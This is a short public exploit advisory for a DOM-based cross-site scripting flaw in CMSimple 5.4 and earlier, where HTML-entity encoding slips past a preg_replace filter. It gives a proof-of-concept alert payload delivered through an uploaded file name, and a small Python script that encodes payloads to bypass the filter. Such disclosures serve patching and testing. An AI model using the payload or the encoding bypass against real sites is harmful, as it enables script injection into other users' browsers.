# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS) # Date: 22/10/2021 # Exploit Author: heinjame # Vendor Homepage: https://www.cmsimple.org/en/ # Software Link: https://www.cmsimple.org/en/?Downloads # Version: <=5.4 # Tested on: Linux os [Description] Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. So the application let's attacker perform DOM based XSS. [Payload and POC] File > images > Upload a file Attack vector >> ')-alert(1)// (need to encode)>> ')-alert(1)// When the victim clicks the delete button,an alert will be executed. Script to encode the payload payload = input() finalpayload = "" for i in payload: finalpayload = finalpayload + "&#" + str(ord(i)) + ";" print(finalpayload)